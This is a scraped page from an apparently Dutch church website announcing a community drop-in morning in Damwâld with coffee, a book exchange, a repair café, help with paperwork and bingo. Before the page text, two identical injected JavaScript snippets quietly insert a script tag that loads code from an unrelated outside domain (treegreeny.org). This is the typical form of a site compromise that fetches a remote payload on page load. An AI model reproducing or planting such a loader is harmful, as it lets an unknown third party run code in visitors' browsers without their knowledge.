;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inloopochtend “IT Trefpunt“ 10 november - PKN Damwâld

Inloopochtend “IT Trefpunt“ 10 november

Gepubliceerd op: vrijdag 14 oktober 2016

Dit voorjaar zijn wij gestart onder de naam IT TREFPUNT, met inloopochtenden in de vernieuwde zalen bij de Geref. Kerk te Damwald, Foarwei 48. Die vinden steeds plaats 1 keer per 14 dagen, op donderdagochtend van 9.30 uur tot ongeveer 11.30. Bezoekers kunnen genieten van gratis koffie/thee/fris, de kranten lezen, spelletjes doen of gezellig met elkaar praten. We hebben ook veel boeken en tijdschriften die bezoekers zo kunnen meenemen, lezen en terugbrengen. Men mag ook eigen boeken inleveren, die anderen vervolgens kunnen lezen. Ook is het al mogelijk om kapotte spulletjes mee te nemen voor ons repaircafe, indien u geen andere mogelijkheden heeft om die te laten maken. Nieuw is, dat u hulp kunt krijgen bij brieven over Zorg/WMO, belastingen, financiële of heel veel andere zaken. Dat kan tijdens de inloop en eventueel in een aparte ruimte. U kunt ook vragen of één van onze organisatie (de vertrouwenspersoon) bij u thuis wil komen om u te helpen (Koop Schaafsma via 0613765741).
Wilt u in de directe omgeving ergens naar toe (winkel, arts, ziekenhuis) en is vervoer nodig, ook dan kunnen wij u helpen.
De organisatie van It Trefpunt hoopt dat het een mooi seizoen mag worden: dat veel mensen komen en terugkomen, omdat ze er iets vinden! De organisatie wil hiervoor alles in het werk stellen en daarom ook proberen met nieuwe activiteiten te komen, het liefst door bezoekers zelf aangedragen!! Tenslotte wil de organisatie benadrukken dat IEDEREEN WELKOM is.

Na de pilot, is op 29 september het 1e seizoen van start gegaan, o.a. met enkel ronden Bingo met prijzen die gratis waren beschikbaar gesteld door: slagerij Talsma, de echte groenteman Klaas en Maaike van der Meer, Heslinga’s smulpaleis en ambachtelijke slagerij Jitta de Haan. Namens de organisatie, HARTELIJK DANK!!
Vanaf het begin in april, wordt de inloop goed bezocht en wordt er aan diverse activiteiten meegedaan. Onder leiding en instructies van Govert Bax was er een zestal bezig met de schilderkunst. En Annie van der Heide leerde diverse dames hoe ze zelf mooie kaarten/enveloppen kunnen maken. Annie en Govert hartelijk dank en we hopen nog vaak op jullie inbreng te kunnen rekenen.
Verder werd er weer volop gerummikubt en gesjoeld. We hebben wat foto’s gemaakt die niet alleen de sfeer maar ook ontluikende kunstenaars laten zien.